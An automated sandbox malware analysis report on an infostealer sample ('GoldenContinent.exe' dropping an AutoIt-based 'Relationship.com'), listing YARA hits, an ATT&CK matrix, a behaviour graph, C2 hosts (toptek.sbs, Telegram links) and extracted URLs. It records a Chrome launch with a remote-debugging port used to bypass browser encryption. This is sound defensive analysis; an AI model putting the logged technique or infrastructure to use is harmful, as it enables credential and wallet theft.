                Source: Relationship.com.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Relationship.comBinary or memory string: WIN_XPe
                Source: Relationship.comBinary or memory string: WIN_VISTA
                Source: Relationship.comBinary or memory string: WIN_7
                Source: Relationship.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Relationship.com.43f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C72263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00C72263
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C71C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00C71C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol4
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection
                2
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                1
                Remote Access Software
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                1
                DLL Side-Loading
                NTDS27
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                Extra Window Memory Injection
                LSA Secrets221
                Security Software Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection
                111
                Masquerading
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579534 Sample: GoldenContinent.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 100 46 toptek.sbs 2->46 48 t.me 2->48 50 ezaZTimpWHt.ezaZTimpWHt 2->50 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 5 other signatures 2->72 10 GoldenContinent.exe 27 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 38 C:\Users\user\AppData\...\Relationship.com, PE32 12->38 dropped 74 Drops PE files with a suspicious file extension 12->74 16 Relationship.com 28 12->16         started        20 cmd.exe 2 12->20         started        22 conhost.exe 12->22         started        24 7 other processes 12->24 signatures7 process8 dnsIp9 40 toptek.sbs 94.130.188.57, 443, 49739, 49740 HETZNER-ASDE Germany 16->40 42 t.me 149.154.167.99, 443, 49738 TELEGRAMRU United Kingdom 16->42 44 127.0.0.1 unknown unknown 16->44 58 Attempt to bypass Chrome Application-Bound Encryption 16->58 60 Found many strings related to Crypto-Wallets (likely being stolen) 16->60 62 Found API chain indicative of sandbox detection 16->62 64 4 other signatures 16->64 26 chrome.exe 16->26         started        29 cmd.exe 1 16->29         started        signatures10 process11 dnsIp12 52 192.168.2.4, 138, 443, 49723 unknown unknown 26->52 54 239.255.255.250 unknown Reserved 26->54 31 chrome.exe 26->31         started        34 conhost.exe 29->34         started        36 timeout.exe 1 29->36         started        process13 dnsIp14 56 www.google.com 142.250.181.68, 443, 49751, 49752 GOOGLEUS United States 31->56

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                GoldenContinent.exe11%ReversingLabs
                GoldenContinent.exe13%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\523266\Relationship.com0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                toptek.sbs
                94.130.188.57
                truetrue
                  unknown
                  t.me
                  149.154.167.99
                  truefalse
                    high
                    www.google.com
                    142.250.181.68
                    truefalse
                      high
                      ezaZTimpWHt.ezaZTimpWHt
                      unknown
                      unknownfalse
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabRelationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drfalse
                          high
                          https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drfalse
                              high
                              https://docs.google.com/document/Jchrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://anglebug.com/4633chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://anglebug.com/7382chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drfalse
                                      high
                                      https://issuetracker.google.com/284462263chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://google-ohttp-relay-join.fastly-edge.com/Cchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://docs.google.com/document/:chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://google-ohttp-relay-join.fastly-edge.com/Fchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://anglebug.com/7714chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://google-ohttp-relay-join.fastly-edge.com/Mchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://google-ohttp-relay-join.fastly-edge.com/Qchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://google-ohttp-relay-join.fastly-edge.com/Pchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://google-ohttp-relay-join.fastly-edge.com/Wchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.google.com/?lfhs=2chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://anglebug.com/6248chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://google-ohttp-relay-join.fastly-edge.com/Tchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://google-ohttp-relay-join.fastly-edge.com/Zchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://t.me/k04aelKmRelationship.com, 0000000A.00000002.2594436163.0000000004177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://anglebug.com/6929chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://anglebug.com/5281chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://google-ohttp-relay-join.fastly-edge.com/achrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.youtube.com/?feature=ytcachrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drfalse
                                                                                        high
                                                                                        https://google-ohttp-relay-join.fastly-edge.com/echrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://google-ohttp-relay-join.fastly-edge.com/dchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://issuetracker.google.com/255411748chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://anglebug.com/7246chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://anglebug.com/7369chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://anglebug.com/7489chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2177663174.0000781002EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://drive-daily-2.corp.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drfalse
                                                                                                            high
                                                                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRelationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drfalse
                                                                                                              high
                                                                                                              https://t.me/k04aelm0nk3Mozilla/5.0Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.autoitscript.com/autoit3/XRelationship.com, 0000000A.00000000.1702695085.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp, Gnu.0.dr, Relationship.com.1.drfalse
                                                                                                                  high
                                                                                                                  https://chrome.google.com/webstore?hl=en4chrome.exe, 0000000F.00000003.2218770227.0000781003338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.ecosia.org/newtab/Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drfalse
                                                                                                                        high
                                                                                                                        https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://anglebug.com/3078chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anglebug.com/7553chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://anglebug.com/5375chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://anglebug.com/5371chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://anglebug.com/4722chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000003.2162033493.00007810023D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://anglebug.com/7556chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/xchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRelationship.com, 0000000A.00000002.2594809497.0000000004208000.00000004.00000800.00020000.00000000.sdmp, MYC2D2.10.drfalse
                                                                                                                                                high
                                                                                                                                                https://toptek.sbsosh;Relationship.com, 0000000A.00000002.2598479689.000000000446C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://anglebug.com/6692chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://anglebug.com/3502chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3623chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/3625chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/3624chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.google.com/presentation/Jchrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://t.mRelationship.com, 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986783267.00000000041A2000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986532671.000000000187D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://anglebug.com/5007chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/3862chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
